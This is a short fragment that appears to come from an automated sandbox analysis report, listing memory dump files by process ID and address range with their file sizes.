    • memory/2564-14-0x00000000011B0000-0x00000000011D2000-memory.dmp
      Filesize

      136KB

    • memory/3100-5-0x00007FFAE1F50000-0x00007FFAE293C000-memory.dmp
      Filesize

      9.9MB

    • memory/3100-6-0x0000020CA2B10000-0x0000020CA2B11000-memory.dmp
      Filesize

      4KB

    • memory/3100-7-0x0000020CA2CC0000-0x0000020CA2CC1000-memory.dmp
      Filesize

      4KB

    • memory/3100-4-0x0000000000000000-mapping.dmp
    • memory/3104-3-0x0000000000000000-mapping.dmp
    • memory/4760-2-0x000001F95F9C0000-0x000001F95FFF7000-memory.dmp
      Filesize

      6.2MB